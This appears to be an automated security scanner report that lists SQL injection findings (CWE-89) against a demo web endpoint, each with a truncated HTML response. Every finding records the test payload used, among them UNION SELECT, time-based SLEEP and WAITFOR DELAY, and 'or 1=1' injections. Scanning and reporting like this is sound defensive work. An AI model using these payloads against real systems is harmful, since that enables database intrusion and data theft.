href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #509\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #510Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #511\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #512\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #513\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' AnD SLEEP(5) ANd '1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #514\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #515\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #516\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #517\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \";waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #518\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAnD SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #519\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #520\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 1083=1083 AND ('1427=1427\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #521\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #522\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io RANDOMBLOB(1000000000/2)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token 